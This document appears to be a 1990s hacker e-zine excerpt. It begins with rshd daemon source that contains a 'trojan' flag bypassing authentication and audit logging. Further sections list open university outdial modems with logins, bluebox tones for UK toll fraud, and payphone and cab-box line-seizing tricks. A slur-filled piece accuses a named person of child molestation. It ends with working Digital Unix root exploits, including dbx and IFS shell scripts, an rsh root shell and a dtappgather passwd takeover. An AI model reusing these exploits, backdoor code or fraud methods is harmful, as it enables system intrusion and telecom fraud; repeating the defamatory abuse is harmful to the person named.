audit_rshd_fail("Login incorrect", hostname,
remuser, locuser, cmdbuf); /* BSM */
exit(1);
}
}

/*
* maintain 2.1 and 4.* and BSD semantics with anonymous rshd
*/

if (!trojan && shpwd->sp_pwdp != 0 && *shpwd->sp_pwdp != '\0' &&
ia_auth_netuser(iah, remuser, &ia_status) != IA_SUCCESS ) {
error("permission denied\n");
audit_rshd_fail("Permission denied", hostname,
remuser, locuser, cmdbuf); /* BSM */
exit(1);
}

if (chdir(pwd->pw_dir) < 0) {
(void) chdir("/");
#ifdef notdef
error("No remote directory.\n");
exit(1);
#endif
}

(void) write(2, "\0", 1);
if (port) {
if (pipe(pv) < 0) {
error("Can't make pipe.\n");
exit(1);
}
pid = fork();
if (pid == (pid_t)-1) {
error("Fork (to start shell) failed on server. Please try again later.\n");
exit(1);
}

#ifndef MAX
#define MAX(a,b) (((u_int)(a) > (u_int)(b)) ? (a) : (b))
#endif /* MAX */

if (pid) {
int width = MAX(s, pv[0]) + 1;
fd_set ready;
fd_set readfrom;

(void) close(0); (void) close(1); (void) close(2);
(void) close(f); (void) close(pv[1]);
FD_ZERO (&ready);
FD_ZERO (&readfrom);
FD_SET (s, &readfrom);
FD_SET (pv[0], &readfrom);
if (ioctl(pv[0], FIONBIO, (char *)&one) == -1)
syslog (LOG_INFO, "ioctl FIONBIO: %m");
/* should set s nbio! */
do {
ready = readfrom;
if (select(width, &ready, (fd_set *)0,
(fd_set *)0, (struct timeval *)0) < 0)
break;
if (FD_ISSET (s, &ready)) {
if (read(s, &sig, 1) <= 0)
FD_CLR (s, &readfrom);
else
killpg(pid, sig);
}
if (FD_ISSET (pv[0], &ready)) {
errno = 0;
cc = read(pv[0], buf, sizeof (buf));
if (cc <= 0) {
shutdown(s, 1+1);
FD_CLR (pv[0], &readfrom);
} else
(void) write(s, buf, cc);
}
} while (FD_ISSET (s, &readfrom) ||
FD_ISSET (pv[0], &readfrom));
exit(0);
}
setpgrp(0, getpid());
(void) close(s); (void) close(pv[0]);
dup2(pv[1], 2);
(void) close(pv[1]);
}
if (*pwd->pw_shell == '\0')
pwd->pw_shell = "/bin/sh";
(void) close(f);

/*
* write audit record before making uid switch
*/

if (!trojan)
{
audit_rshd_success(hostname, remuser, locuser, cmdbuf); /* BSM */

if (retval = ia_setcred(iah, SC_INITGPS|SC_SETRID,
pwd->pw_uid, pwd->pw_gid, 0, NULL, &ia_status)) {
switch (retval) {
case 0:
break;
case IA_BAD_GID:
error("Invalid gid.\n");
exit(1);
case IA_BAD_UID:
error("Invalid uid.\n");
exit(1);
default:
exit(1);
}
}
ia_end(iah);
}
#ifdef SYSV
if (pwd->pw_uid)
envinit[ENVINIT_PATH] = userpath;
else
envinit[ENVINIT_PATH] = rootpath;
if (tzenv = getenv("TZ")) {
/*
* In the line below, 4 is strlen("TZ=") + 1 null byte.
* We have to malloc the space because it's difficult to
* compute the maximum size of a timezone string.
*/

tz = (char *) malloc(strlen(tzenv) + 4);
if (tz) {
strcpy(tz, "TZ=");
strcat(tz, tzenv);
envinit[ENVINIT_TZ] = tz;
}
}
#endif /* SYSV */
strncat(homedir, pwd->pw_dir, sizeof(homedir)-6);
strncat(shell, pwd->pw_shell, sizeof(shell)-7);
strncat(username, pwd->pw_name, sizeof(username)-6);
cp = rindex(pwd->pw_shell, '/');
if (cp)
cp++;
else
cp = pwd->pw_shell;
#ifdef SYSV
/*
* rdist has been moved to /usr/bin, so /usr/ucb/rdist might not
* be present on a system. So if it doesn't exist we fall back
* and try for it in /usr/bin. We take care to match the space
* after the name because the only purpose of this is to protect
* the internal call from old rdist's, not humans who type
* "rsh foo /usr/ucb/rdist".
*/

#define RDIST_PROG_NAME "/usr/ucb/rdist -Server"
if (strncmp(cmdbuf, RDIST_PROG_NAME, strlen(RDIST_PROG_NAME)) == 0) {
if (stat("/usr/ucb/rdist", &statb) != 0) {
strncpy(cmdbuf + 5, "bin", 3);
}
}
#endif
execle(pwd->pw_shell, cp, "-c", cmdbuf, (char *)0, envinit);
perror(pwd->pw_shell);
exit(1);
}

/*VARARGS1*/
error(fmt, a1, a2, a3)
char *fmt;
int a1, a2, a3;
{
char buf[BUFSIZ];

buf[0] = 1;
(void) sprintf(buf+1, fmt, a1, a2, a3);
(void) write(2, buf, strlen(buf));
}

getstr(buf, cnt, err)
char *buf;
int cnt;
char *err;
{
char c;

do {
if (read(0, &c, 1) != 1)
exit(1);
*buf++ = c;
if (--cnt == 0) {
error("%s too long\n", err);
exit(1);
}
} while (c != 0);
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Outdials : Lirik
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Working Outdials

[100% for 304/319/413/800/804/814 NPAs]

x.25 NPAs:204.306.403.416.418.506.514.519.604.613.709.902.905

===============================================================================

Note þ NPA þ IP/commands/Dial mask/Phones
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

!!! 304 DIALOUT.WVNET.EDU (No parity)
1800 DIALOUTE.WVNET.EDU (Even parity)
ATDT 9,xxxxxxx
http://wvnvm.wvnet.edu/~roman/dialout.html
test phone atdt35001

!!! 319 ISN.IASTATE.EDU. or isn.rdns.iastate.edu
DIAL: MODEM or HELP
ATDT8xxx-xxxx

!!! 413 dialout2400.smith.edu | dialout.smith.edu
Ctrl+} gives PLACE AUTOCAL
press y, wait for CALL COMPLETE
atdt9,,xxx-xxxx
Independent Nation (413)573-1809

!!! 804 ublan.acc.virginia.edu / ublan.virginia.edu
1800 ublan2.acc.virginia.edu
>>connect telnet
>>connect hayes
atdt9,,xxx-xxxx
CPN 804-847-2501

!!! 814 dialout.psu.edu atdt8xxxxxxxxxx

1800 CompuServe 2400 82387910
Telenet 2400 82311510
Tymnet 2400 82343853
DEC. 9600 7AM-Midnight EST 818002341998
Port name: _LTA4974:

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄx.25 network access only [NUI required]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
NPAs:204.306.403.416.418.506.514.519.604.613.709.902.905

DATAPAC 3101 (ASYNC/ITI) OUT-DIAL PORT ADDRESSES
Outdial Ports (accept only prePAID calls!)
The Destination terminal must be set to 7E1
in order to receive the outdial call

1) ENTER THE 7-DIGIT TELEPHONE NUMBER (LOCAL) OF THE DESTINATION
TERMINAL.
2) DATAPAC WILL RESPOND WITH:
DIALING/COMPOSITION DU NUMERO (XXX-XXXX)
3) DATAPAC WILL THEN INDICATE:
RINGING/SONNERIE
AS THE MODEM DETECTS RINGBACK TONE.
4) WHEN THE DESTINATION MODEM ANSWERS THE CALL, DATAPAC WILL SEND
THE FOLLOWING MESSAGE TO THE ORIGINATING END:
CALL CONNECTED/COMMUNICATION ETABLIE

NPA City (PROVINCE) SPEED NUA ADDRESS
--- --------------- ----- -------------
403 Calgary (ALTA) 300 0302063300900
1200 0302063300901
416 Clarkson (ONT) 300 0302091900900
1200 0302091900901
403 Edmonton (ALTA) 300 0302058700900
1200 0302058700901
902 Halifax (NS) 300 0302076101900
1200 0302076101901
905 Hamilton (ONT) 300 0302038500900
1200 0302038500901
519 Kitchener (ONT) 300 0302033400900
1200 0302033400901
519 London (ONT) 300 0302035600900
1200 0302035600901
514 Montreal (QUE) 300 0302082700902
1200 0302082700903
613 Ottawa (ONT) 300 0302085700901
1200 0302085700902
418 Quebec City (QUE) 300 0302048400900
1200 0302048400901
306 Regina (SASK) 300 0302072100900
1200 0302072100901
506 St-John's (NB) 300 0302074600900
1200 0302074600901
306 Saskatoon (SASK) 300 0302071100900
1200 0302071100901
709 St. John (NFLD) 300 0302078100900
1200 0302078100901
416 Toronto (ONT) 300 0302091600901
1200 0302091600902
604 Vancouver (BC) 300 0302067100900
1200 0302067100901
519 Windsor (ONT) 300 0302029500900
1200 0302029500901
204 Winnipeg (MAN) 300 0302069200902
1200 0302069200901

??? 0228479110650 DIALOUT PSW?? CALL 50 LOGIN=LOGIN 70,1/NAME:XX

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Misc ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

!?! EURO eurogate.iit.nl
register call European carriers
(access via telnet is restricted?)

!?! 513 dialout.afit.af.mil dialout PWD?
port 2
!?! 414 modems.uwp.edu Ctrl-{ #
Connection Refused
!?! 404 emory.edu .modem8 or .dialout
!?! DC dialout24.cac.washington.edu
CONNECTION REFUSED
?!? 604 dial24-nc00.net.ubc.ca | dial24-nc01.net.ubc.ca
?!? 604 dial96-np65.net.ubc.ca
!?! isn.upenn.edu "modem" attached to 17 port

LOCAL DIALOUT.IUPUI.EDU
l/p:DIALOUT/

DOWN 213 bbs.thecosmos.com
214 register first / dial dallas and LA
DOWN 215 isn.upenn.edu

DIAL: MODEM
DOWN 416 pacx.utcs.utoronto.ca outdial unavail
www.utoronto.ca/welcome.html/index.html
DOWN? 619 dialin.ucsd.edu "dialout" Sandego CA
DOWN 916 cc-dnet.ucdavis.edu connect hayes/dialout

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Login/Pass or Port Pass ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

PSW 204 dial.cc.umanitoba.ca
PSW 206 rexair.cac.washington.edu
PSW 303 yuma.ACNS.ColoState.EDU login: modem
PSW 412 dialout.pitt.edu / gate.cis.pitt.edu
only for students "Connect Dialout"
"d91kxxxxxx" x=fone #
or tn3270, connect dialout.pitt.edu,
atdtxxxXXXX
PSW 514 cartier.CC.UMontreal.CA externe,9+number
PSW 602 dial9600.telcom.arizona.edu
PSW 619 dialin.ucsd.edu "dialout"
PSW ??? modems.csuohio.edu
PSW ??? dialout.bu.edu
PSW ??? portal.ucs.indiana.edu ONLY for Students
http://msgwww.ucs.indiana.edu/messaging/
/projects/portal/dialout.html
PSW 128.187.1.2
PSW TW sparc20.ncu.edu.tw u349633
PSW TW sun2cc.nccu.edu.tw ?
PSW twncu865.ncu.edu.tw guest

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Trying... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

??? 206 rexair.cac.washington.edu
??? 206 dialout24.cac.washington.edu
??? 218 modem.d.umn.edu Hayes 9,XXX-XXXX
??? 307 modem.uwyo.edu
??? 313 35.1.1.6 "dial2400-aa" or "dial1200-aa"
??? 415 128.32.132.250 CA "dial1" or "dial2"
??? 502 outdial.louisville.edu
??? 502 uknet.uky.edu connect kecnet
@ dial: "outdial2400 or out"
??? 602 acssdial.inre.asu.edu/[129.219.17.3].
atdt8,,,,,[x][yyy]xxxyyyy.
??? 609 129.72.1.59 Princeton NJ | "Hayes"
128.119.131.11X
??? 615 dca.utk.edu "dial2400" Tennessee
??? 713 128.249.27.153 | "Hayes"
??? 713 128.249.27.154 , Login:c modem96
??? 714 130.191.4.70 atdt 8xxx-xxxx
??? 714 modem.nts.uci.edu atdt[area]0[phone]
??? 128.6.1.42
??? modempool.pbs.org "connect"
??? datapbx.cc.ncsu.edu dest:dial ATDT 9,xxxxxxxx
www2.ncsu.edu

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ No route ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

ROUTE OH* r596adi1.uc.edu | 129.137.33.72
ROUTE 404 128.140.1.239 .modem8|CR .modem96|CR
ROUTE 212 DIALOUT.NYU.EDU dial3/dial12/dial24
ROUTE 514 132.204.211
ROUTE 619 128.54.30.1 nue, ? atdt [area][phone]
ROUTE 129.180.1.57
ROUTE ??? modem.nyu.edu
ROUTE ??? TN3270 telnet.ksu.edu
At the Select Destination prompt, enter DIALOUT
Perhaps a better method is to use MS-Kermit 3.10
MSKERMIT
SET HOST TELNET.KSU.KSU.EDU
DIALOUT
ATDT9[1aaappp]xxxxxxx[,,auth]
to USE AT&T calling Card
ATDT90NPAxxxxxxx,,,,CardNumberPIN

7 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Dead ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/// 215 wiseowl.ocis.temple.edu | atz atdt 9xxxyyy
/// 218 aa28.d.umn.edu "cli" "rlogin modem"
/// 404 broadband.cc.emory.edu Atlanta Georgia
/// 404 dialout1.princeton.edu
/// 416 annex132.berkeley.edu. 9xxxyyyy?atdt9,,,,,xxxyyyy?
/// 614 ns2400.ircc.ohio-state.edu (DIAL)
/// 617 dialout.lcs.mit.edu ()
/// 902 star.ccs.tuns.ca | "dialout" P E I
/// modem.atk.com
/// modem.cis.uflu.edu
/// vtnet1.cns.ut.edu "CALL" or "call"

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Note descriptions ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

??? trying IP address...
/// Unknown Host
ROUTE No route to Host
LOCAL Local Access only ?
PSW Login/Password Required
!?! Strange
!!! Working (should be, heh)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Used Dox/Search Engines ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

www.altavista.com | www.infoseek.com [Ultra]
Dialout List#4 - 22/12/93 By SPiN-DoC
2600's Vol. 8 #1 Dialout List +- some junk
alt2660.faq
[Hardcore Phreaks (8)]

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
[eoF^z]

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. BlueBoxing in the UK in '98 : The UK Phreaking Elite
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

.------------------------------------------------------------------.
| \ ____ \__ __ ____ / |
| ___/ / / / \_ / \ / / / \___ !
| / \ ____/ \/___________|___________/ \/________/ \__ :
! __/\/ / / :
: __/ /_________________________________________/ /\__ !
: \_________________________________________\/ / \___ |
: __/ \___ ____/ |
: \__/ \__/ _/ \__/ / \__ |
: / | / . ! . | !
! . : ! : : . :
| | . | ! : : ! :
! : !__| ! |__! : !
: / / D e s T r u C T i v E / / : :
: : !___/ /_______________________/ /____!__ :
! !/ / / / / / ____/ / ___ / !
`-------- / / / / / / / / / / __/ -----------'
\______/\______/\__/___/\______/\__/\______/

"The Hardcore Will Never Die"


Since March 1994 there have been many rumours about the "death" of
Blueboxing. The truth is that Blueboxing is very much alive, it has just
become a little more difficult, and harder to understand. In some cases
it's not just a case of knowing the tones, it also takes a lot of skill
and patience.

The "elites" who have been boxing since then (excluding lamers
spoon-fed info from earlier Destructive Jungle releases), have had to work
hard to find out how to carry on boxing, and have kept it to themselves.


In reaction to recent busts, we are now going to once again, teach the
newbies, lamers, and in fact, everyone we possibly can, how to Bluebox. BT
may think they have a problem already, but the trouble is only just
beginning. Spread this information as far and wide as you can.

This "current" method (as of 24/02/98) is actually very simple:


The magic number is: 0800 890 861 (China Direct Calling Card Service)

Freq 1 Freq 2 Length
---------------------
Tone 1 2400Hz/2600Hz 135ms
Tone 2 2400Hz/2400Hz 240ms

Best to send the break after pick-up. It's all automated, so it won't annoy
any operators.

As well as calling China, you can also call the UK (trade warez for hours!)
and New Zealand. A few other countries are possibly available, but they keep
changing them.

For those of you with bad memories:

KP2-44-0-171-930-4832-ST is the format for international dialling.

---

Special note to BT:

This file is written by nobody in particular. The person(s) posting it
to newsgroups/BBS's/wherever have no connection with us. You can try to find
the people responsible, but will soon come to realise that it's an impossible
mission. Myself and my friends certainly will not be blueboxing, and have
not done for quite some time.

This particular route probably won't last very long, but there are plenty
more to come.

We will always have the upper hand.

Hugs & Kisses.

The UK Phreaking Elite.



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. UK Phone Definitions and Abbreviations : Jf
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

I have put together as much stuff as I think is necessary for an average
knowledge of the UK fone system, switching methods and exchange types.
I would defiently recommend researching into the subjects contained in this
document in more detail to gain a very detailed knowledge, if you are stuck
then email me and I will help to guide you along. The Information below is
enough to get you started and provide you with an average knowledge of the
UK fone system.... so enjoy..

Jf_ aka Josh Freedaleman

JF@cofuk.org
http://www.cofuk.org

======================================
AAS - Automatic Announcement Subsystem
======================================

Used in Local Exchanges as a method of voice operated guidance. eg. informs of
code changes by automated messages. For example, these appeared a lot in 1994
when all area codes changed. On 16th April 1994 all area codes had a 1 added
to them. For example 081 became 0181 and therefore AAS was used alot during
this time to leave automated messages, these go something like this...

"This is a BT announcement, the number you have dialed has changed, pleased add
a 1 after the 0 on the area code and replace the handset and try again"
.

=========
Cab Boxes
=========

Large green boxes located on the sides of roads to deal with all the lines in
that area, some cab boxes are full of 100s of wires for that area whereas
others can be much smaller. I would recommend having a look inside one of these
as they are totally full of wires but don't get caught opening one of these as
you might be arrested! :o) If you open one of these cab boxes you can beige
box off it, good fun if the cab box has 100s of lines in it as you can easily
seize lot of peoples fone lines :o) If you have a laptop computer you could
find a cab box in a secluded area, box of it, hide in bushes or something and
hax0r from that seized line, I would recommend this if you are going to carry
out a big hack. -- Cab boxes are also called PCP's (so1o)

========================================================================
CCITT - Consultive Committee for International Telegraphs and Telephones
========================================================================

An international committee setup to regulate and discuss international fone
communication matters and standards of communication devices. The UK fone
system is based on CCITT7 which is used in most developed (?) countries such
a America and the UK. To blue box from the UK you need to be looking for
countries which used CCITT5 lines, the best way I know of to find CCITT5
lines is to dial the countries 0800 89 **** number and if you here a click
beep sound then you have identified a CCITT5 line which is vulnerable to
boxing.

===============================
CCS - Common Channel Signalling
===============================

Process used by BT to reserve a speech channel for signalling and to control
all the other channels in its section. This is the standard method of
signalling between digital exchanges.

===============================================
COCOT - Customer Owned Coin Operated Telephones
===============================================

A Payphone owned privately by businesses, they usually add a little bit extra
onto the price of calls to make some more money, found in hotels, swimming
pools etc. There are lots of COCOT tricks that you can get up to, I have not
tried all of them but two that I have tried and have worked succesfully for
me are the following -

dial *#2580 on the fonepad, it makes the line an engineers test line and you
can then dial any number you wish for free, and I mean any number :o)

Another trick is that some COCOT's have the line going into a wallplug located
near the telephone, just unhook the fone line and plug your own fone in place,
I did this at my local Swimming Pool recently and dialed a friend in the States
for FREE!#@!

===============================
CPS - Call Processing Subsystem
===============================

Used on local exchanges to take overall control over a line, it registers the
state of the line and tells callers whether it is free, engaged etc. This is
the fundamental part of the local exchange and without this, well, there would
be no calls really as nothing would be able to register.

===================================
DCCE - Digital Cell Centre Exchange
===================================

Another exchange which handles services on a local scale, distributing calls
to other exchanges, this is a lesser form of DMSU but perfoms a similar job.

=========================================
DDSN - Digitally Derived Services Network
=========================================

A network of numbers used as service numbers eg 0800, 0891, 0898, 0500.

=============================
DLE - Digital Local Exchanges
=============================

Hosts the RCU's used within a local exchange, If you get a chance to look at
you local DLE do it, I found it very impressive and was really stood there
in awe of it all.

===================================
DLSU - Digital Local Switching Unit
===================================

Handles all the local customers fone needs and services, putting them onto the
right connections and switching them about so that they reach their required
destination. Really like an operator but as this is the 1990s its all in
digital form :o)

==================================
DMSU - Digital Main Switching Unit
==================================

Controls and switches Telephone traffic within its designated area and it will
distribute this traffic to its local exchanges.

============================
DSU - Digital Switching Unit
============================

Original Manufactured to handle the very high call volume in and around London,
based on the DMSU but designed to take a higher amount of calls and distribute
them onto the local exchanges. DSU's are now found in and around lots of major
large cities where they are needed to take control of the high call volume
while the DMSU's take care of the rest of the country.

================================
DTMF - Dual Tone Multi-Frequency
================================

The tones heard on your home fone when you dial in your numbers on the keypad.

==============================
ERS - Emergency Repair Service
==============================

The Engineers on Standby to repair fones etc.

=============
Meridian Mail
=============

A Voice Mail System provider, owned by Northern Telecom and a major UK
supplier of VMB's for UK businesses. -- there are a few neat meridian mail
tricks (so1o)

=============================
PBX - Private Branch Exchange
=============================

Exchange used by large companies to deal with their calls, great fun to
*hack*, I have found that these are usually located in the 0500 prefix
range. These are usually provided by Norstar and are very common with big
companies who have stores in all areas of the country, or on a local scale.

===========================
PCM - Pulse Code Modulation
===========================

Modern BT signalling method used which cuts down information from several calls
into smaller packets, sending them in turn down the line.

========================================
PSTN - Public Switched Telephone Network
========================================

This is a large BT exchange network which contains all the smaller local
exchanges and looks after all these. eg. DLE's, RCU's etc

==============================
RCU - Remote Concentrator Unit
==============================

Basically Cab Boxes (PCPs) that provide a meeting point for ALL the lines in
an area, they are bigger than Cab Boxes and tend to occupy full buildings
rather than little boxes on the side of the road, RCU's are therefore found
at your local telco depot and they are very impressive to look at.

========
System X
========

System X is a digital phone exchange which was the first installed in UK and
was set to be installed 100% throughout UK until someone thought that it was
unfair for one company to dominate the digital exchange market so a company
called Ericsson produced AXE, a rival digital fone exchange system, the
AXE10 system was chosen by BT and this forms what we call the BT System Y
Exchange. System X technology was soon outdated after release due to the
fact that it was designed by a committee who were slow at releasing its first
model and by this time AXE had been released and it saw a vast technological
improvement on System X while keeping the fundamental backbone on which it
was based.

========
System Y
========

The UK digital Exchange based heavily on the AXE10 Digital Exchnage System
Manufactured by Swesih company Ericsson, System Y is the UK alternative to
System X and is installed fully in over 90% of the UK. When it was released
it was much more technologically advanced than System X but heavily
structured on it.

====================
VMB - Voice Mail Box
====================

Used by companies to keep in touch with each other by an answering machine
type of service, usually found as freefone numbers and a main supplier of
these is Meridian Mail. There are lots of VMBs which can be found if you scan
for them and they provide interesting toys if you want to *hack* them.



Thats your lot for now...I believe that the information in this document is
all you need for an average knowledge of the UK fone system. I have cut out all
the bullshit and all the outdated info that you will find in numerous other
texts and left you with what you need. If you have found an area in this
document that really interests you then do more research into that area and
specialise, you should be able to find further information on most things
included in this document, so go hunting or look out for more texts from me
soon....

If you would like to talk about anything connected with this text or any other
relevant h/p stuff then you can find me in #phreak and #CoF on undernet when
I am on irc. My nick is Jf_ of course :o)

Jf_ aka Josh Freedaleman

JF@cofuk.org
CoF -

  
http://www.cofuk.org


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Top Ten Reasons why..You shouldn't leave small children alone with
Emmanuel Goldstein.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

10) He isn't down with the posse, although he think's he is
9) He seems a little too friendly
8) He likes little boys
7) His nick is jewish
6) so1o said so
5) He appeared on "The Learning Channel" inbetween when
speedy and gonzolez showed you how to get free AOL
and how to generate credit card numbers
4) He published an arcticle on how to steal (*gasp*)
3) He was an english major
2) Do you know how hard it is to get rid of head lice?
1) HE'S A FUCKIN CHILD MOLESTER YOU DUMB CUNT!@^&%$@%

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Hacking Digital Unix 4.0 : humble
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Local techniques
----------------

The first thing to try is the IFS hole in /usr/sbin/dop. If dop is setuid
root, there is a good chance that you can gain root this way. Here is a
shell script :

----------------------------------------------------------------------------

#!/bin/sh
cat > /tmp/usr <<EOF
#!/bin/sh
IFS=" "
export IFS
exec /bin/sh
EOF
chmod 755 /tmp/usr
IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root

----------------------------------------------------------------------------

After running this shell script, if it works, your euid should be 0. Your
prompt may or may not change depending on which shell you are using, so do
an id and check. That is a old sploit that most competent admins have
probably fixed.

Digital Unix has a large problem in the way that it handles core dumps of
setuid root programs. If you can get a setuid root program to dump core,
it will create the core file as root, and it will follow symlinks. So,
how can we exploit this? I noticed a long time ago that if you run dbx
on a setuid root program that you have read access to, then it will core dump
in your current directory. Dbx is a debugger that comes with digital unix.
However, some times machines won't have the liscence files installed
correctly. Here is the exploit :

----------------------------------------------------------------------------

#!/bin/sh
# dbx exploit by humble
# works on Digital Unix 4.x
# this overwrites /.rhosts

mkdir /tmp/.testing
cd /tmp/.testing
ln -s /.rhosts core
BOB="
+ +
"
export BOB
dbx /bin/crontab
dbx /bin/crontab
dbx /bin/crontab
rm -rf /tmp/.testing
rsh -l root localhost /bin/sh -i

----------------------------------------------------------------------------

If /bin/crontab is not setuid root or you don't have read permissions to
it, you can use any other setuid root program.

Ok. If that doesn't work, there is another core dump situation I have
found. I have only verified this on three machines and have been told
that it hasn't worked on one or two others. The program /usr/X11/bin/dxpause
is a screen locker. I found that when I run that program, and have my
DISPLAY set to my freebsd or my linux box (running xfree86), the program
will dump core as root. Be carefull though, if the program doesn't dump
core, you will have to enter the password of the person who's account
you are using. You have to set up your X server to allow connections from
the target, and you will probably have to click once on your machine to
get the program running on the Digital Unix box to crash.
Anyway, this can be exploited in a similair fashion to the dbx problem.

There is another core dump that was mentioned on Bugtraq by Tom Leffingwell,
but I haven't been able to re-create it. Here is excerpts from his posting:

----------------------------------------------------------------------------

Version Affected: Digital UNIX 4.0B *with* patch kit 5
Unpatched 4.0B is not vunerable to this particular
problem, but it is to others.

Patch kit 5 included a replacement xterm because the old one had a bug, too.
They replaced it with another that had a bigger problem. You can cause a
segmentation fault in xterm simply by setting your DISPLAY variable to a
display that you aren't allowed to connect to or one that doesn't exist.
Start xterm, and you get a core file.

----------------------------------------------------------------------------

Ok, core dumps not working? Don't worry.. there's more.
There has been some talk about holes in dtappgather on the security mailing
lists. We can use one of the holes to our advantage as well.
Using dtappgather, we can make any file on the system owned by us. This is
obviously a good way to take over a machine. Exploit:

env DTUSERSESSION=../../../../../../../../etc/passwd /usr/dt/bin/dtappgather

and /etc/passwd is now owned by us. This could be used to gain control of
/etc/inetd.conf and just about anything else you could imagine. I haven't
used this exploit to mess around with the /tcb/files/auth/* tree, but I
would be willing to bet it is very successfull.

